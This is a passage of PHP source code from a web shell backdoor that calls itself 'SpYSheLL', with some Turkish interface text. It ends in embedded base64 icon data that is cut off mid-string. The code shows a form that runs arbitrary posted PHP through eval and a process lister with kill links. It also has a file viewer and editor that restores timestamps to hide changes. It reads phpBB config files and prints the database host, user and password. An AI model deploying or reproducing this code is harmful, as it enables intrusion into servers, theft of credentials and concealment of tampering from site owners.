  $parsesort = parsesort($processes_sort);
  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  $k = $parsesort[0];
  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  $ret = htmlspecialchars($ret);
  if (!$win)
  {
   if ($pid)
   {
    if (is_null($sig)) {$sig = 9;}
    echo "Sending signal ".$sig." --> #".$pid."... ";
    if (posix_kill($pid,$sig)) {echo "OK.";}
    else {echo "Hata.";}
   }
   while (strstr($ret,"  ")) {$ret = str_replace("  "," ",$ret);}
   $stack = explode("\n",$ret);
   $head = explode(" ",$stack[0]);
   unset($stack[0]);
   for($i=0;$i<count($head);$i++)
   {
    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
   }
   $prcs = array();
   foreach ($stack as $line)
   {
    if (!empty($line))
	{
	 echo "<tr>";
     $line = explode(" ",$line);
     $line[10] = join(" ",array_slice($line,10));
     $line = array_slice($line,0,11);
     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
     $prcs[] = $line;
     echo "</tr>";
    }
   }
  }
  else
  {
   while (strstr($ret,"  ")) {$ret = str_replace("  ","	",$ret);}
   while (strstr($ret,"  ")) {$ret = str_replace("  ","	",$ret);}
   while (strstr($ret,"  ")) {$ret = str_replace("  ","	",$ret);}
   while (strstr($ret,"  ")) {$ret = str_replace("  ","	",$ret);}
   while (strstr($ret,"  ")) {$ret = str_replace("  ","	",$ret);}
   while (strstr($ret,"  ")) {$ret = str_replace("  ","	",$ret);}
   while (strstr($ret,"  ")) {$ret = str_replace("  ","	",$ret);}
   while (strstr($ret,"  ")) {$ret = str_replace("  ","	",$ret);}
   while (strstr($ret,"  ")) {$ret = str_replace("  ","	",$ret);}
   while (strstr($ret,"		")) {$ret = str_replace("		","	",$ret);}
   while (strstr($ret,"	 ")) {$ret = str_replace("	 ","	",$ret);}
   $ret = convert_cyr_string($ret,"d","w");
   $stack = explode("\n",$ret);
   unset($stack[0],$stack[2]);
   $stack = array_values($stack);
   $head = explode("	",$stack[0]);
   $head[1] = explode(" ",$head[1]);
   $head[1] = $head[1][0];
   $stack = array_slice($stack,1);
   unset($head[2]);
   $head = array_values($head);
   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
   if ($k > count($head)) {$k = count($head)-1;}
   for($i=0;$i<count($head);$i++)
   {
    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
   }
   $prcs = array();
   foreach ($stack as $line)
   {
    if (!empty($line))
    {
     echo "<tr>";
     $line = explode("	",$line);
     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
     $prcs[] = $line;
     echo "</tr>";
    }
   }
  }
  $head[$k] = "<b>".$head[$k]."</b>".$y;
  $v = $processes_sort[0];
  usort($prcs,"tabsort");
  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  $tab = array();
  $tab[] = $head;
  $tab = array_merge($tab,$prcs);
  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  foreach($tab as $i=>$k)
  {
   echo "<tr>";
   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
   echo "</tr>";
  }
  echo "</table>";
 }
}
if ($act == "eval")
{
 if (!empty($eval))
 {
  echo "<b>Result of execution this PHP-code</b>:<br>";
  $tmp = ob_get_contents();
  $olddir = realpath(".");
  @chdir($d);
  if ($tmp)
  {
   ob_clean();
   eval($eval);
   $ret = ob_get_contents();
   $ret = convert_cyr_string($ret,"d","w");
   ob_clean();
   echo $tmp;
   if ($eval_txt)
   {
    $rows = count(explode("\r\n",$ret))+1;
    if ($rows < 10) {$rows = 10;}
    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
   }
   else {echo $ret."<br>";}
  }
  else
  {
   if ($eval_txt)
   {
    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
    eval($eval);
    echo "</textarea>";
   }
   else {echo $ret;}
  }
  @chdir($olddir);
 }
 else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"OK\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
}
if ($act == "f")
{
 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
 {
  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Olustur</u></a></center>";}
 }
 else
 {
  $r = @file_get_contents($d.$f);
  $ext = explode(".",$f);
  $c = count($ext)-1;
  $ext = $ext[$c];
  $ext = strtolower($ext);
  $rft = "";
  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  if (strstr($f,"sess_(.*)")) {$rft = "phpsess";}
  if (empty($ft)) {$ft = $rft;}
  $arr = array(
   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
   array("Code","code"),
   array("Session","phpsess"),
   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
   array("SDB","sdb"),
   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
  );
  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
  foreach($arr as $t)
  {
   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
  }
  echo "<hr size=\"1\" noshade>";
  if ($ft == "info")
  {
   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
   if (!$win)
   {
    echo "<tr><td><b>Owner/Group</b></td><td> ";    
    $ow = posix_getpwuid(fileowner($d.$f));
    $gr = posix_getgrgid(filegroup($d.$f));
    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
   }
   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Olustur time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>Modifiye Zamani</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
   $fi = fopen($d.$f,"rb");
   if ($fi)
   {
    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
    $n = 0;
    $a0 = "00000000<br>";
    $a1 = "";
    $a2 = "";
    for ($i=0; $i<strlen($str); $i++)
    {
     $a1 .= sprintf("%02X",ord($str[$i]))." ";
     switch (ord($str[$i]))
     {
      case 0:  $a2 .= "<font>0</font>"; break;
      case 32:
      case 10:
      case 13: $a2 .= "&nbsp;"; break;
      default: $a2 .= htmlspecialchars($str[$i]);
     }
     $n++;
     if ($n == $hexdump_rows)
     {
      $n = 0;
      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
      $a1 .= "<br>";
      $a2 .= "<br>";
     }
    }
    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
   }
   $encoded = "";
   if ($base64 == 1)
   {
    echo "<b>Base64 Encode</b><br>";
    $encoded = base64_encode(file_get_contents($d.$f));
   }
   elseif($base64 == 2)
   {
    echo "<b>Base64 Encode + Chunk</b><br>";
    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
   }
   elseif($base64 == 3)
   {
    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
    $encoded = base64_encode(file_get_contents($d.$f));
    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
   }
   elseif($base64 == 4)
   {
    $text = file_get_contents($d.$f);
    $encoded = base64_decode($text);
    echo "<b>Base64 Decode";
    if (base64_encode($encoded) != $text) {echo " (failed)";}
    echo "</b><br>";
   }
   if (!empty($encoded))
   {
    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
   }
   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
<P>";
  }
  elseif ($ft == "html")
  {
   if ($white) {@ob_clean();}
   echo $r;
   if ($white) {ashshexit();}
  }
  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,true)); echo "</pre>";}
  elseif ($ft == "phpsess")
  {
   echo "<pre>";
   $v = explode("|",$r);
   echo $v[0]."<br>";
   var_dump(unserialize($v[1]));
   echo "</pre>";
  }
  elseif ($ft == "exe")
  {
   $ext = explode(".",$f);
   $c = count($ext)-1;
   $ext = $ext[$c];
   $ext = strtolower($ext);
   $rft = "";
   foreach($exeftypes as $k=>$v)
   {
    if (in_array($ext,$v)) {$rft = $k; break;}
   }
   $cmd = str_replace("%f%",$f,$rft);
   echo "<b>Uygulanamadi! dosya:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"OK\"></form>";
  }
  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
  elseif ($ft == "code")
  {
   if (strstr($r,"php"."BB 2.(.*) auto-generated config file"))
   {
    $arr = explode("\n",$r);
    if (count($arr == 18))
    {
     include($d.$f);
     echo "<b>phpBB configuration is detected in this file!<br>";
     if ($dbms == "mysql4") {$dbms = "mysql";}
     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by SpYSheLL. Please, report us for fix.";}
     echo "Parameters for manual connect:<br>";
     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
     echo "</b><hr size=\"1\" noshade>";
    }
   }
   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
   if (!empty($white)) {@ob_clean();}
   highlight_file($d.$f);
   if (!empty($white)) {ashshexit();}
   echo "</div>";
  }
  elseif ($ft == "download")
  {
   @ob_clean();
   header("Content-type: application/octet-stream");
   header("Content-length: ".filesize($d.$f));
   header("Content-disposition: attachment; filename=\"".$f."\";");
   echo $r;
   exit;
  }
  elseif ($ft == "notepad")
  {
   @ob_clean();
   header("Content-type: text/plain");
   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
   echo($r);
   exit;
  }
  elseif ($ft == "img")
  {
   $inf = getimagesize($d.$f);
   if (!$white)
   {
    if (empty($imgsize)) {$imgsize = 20;}
    $width = $inf[0]/100*$imgsize;
    $height = $inf[1]/100*$imgsize;
    echo "<center><b>Size:</b>&nbsp;";
    $sizes = array("100","50","20");
    foreach ($sizes as $v)
    {
     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
     if ($imgsize != $v ) {echo $v;}
     else {echo "<u>".$v."</u>";}
     echo "</a>&nbsp;&nbsp;&nbsp;";
    }
    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
   }
   else
   {
    @ob_clean();
    $ext = explode($f,".");
    $ext = $ext[count($ext)-1];
    header("Content-type: ".$inf["mime"]);
    readfile($d.$f);
    exit;
   }
  }
  elseif ($ft == "edit")
  {
   if (!empty($submit))
   {
    if ($filestealth) {$stat = stat($d.$f);}
    $fp = fopen($d.$f,"w");
    if (!$fp) {echo "<b>Dosyaya Yazilamadi!</b>";}
    else
    {
     echo "<b>Kaydedildi!</b>";
     fwrite($fp,$edit_text);
     fclose($fp);
     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
     $r = $edit_text;
    }
   }
   $rows = count(explode("\r\n",$r));
   if ($rows < 10) {$rows = 10;}
   if ($rows > 30) {$rows = 30;}
   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  }
  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
 }
}
}
else
{
 @ob_clean();
 $images = array(
"arrow_ltr"=>
"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
"back"=>
"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
"Wg0JADs=",
"buffer"=>
"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
"change"=>
"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
"zMshADs=",
"delete"=>
"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
"download"=>
"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
"forward"=>
"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
"WqsJADs=",
"home"=>
"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
"mode"=>
"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
"refresh"=>
"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
"search"=>
"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
"setup"=>
"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
"small_dir"=>
"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
"small_unk"=>
"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
"yAsokBkQADs=",
"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
"sort_asc"=>
"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
"sort_desc"=>
"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
"sql_button_drop"=>
"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
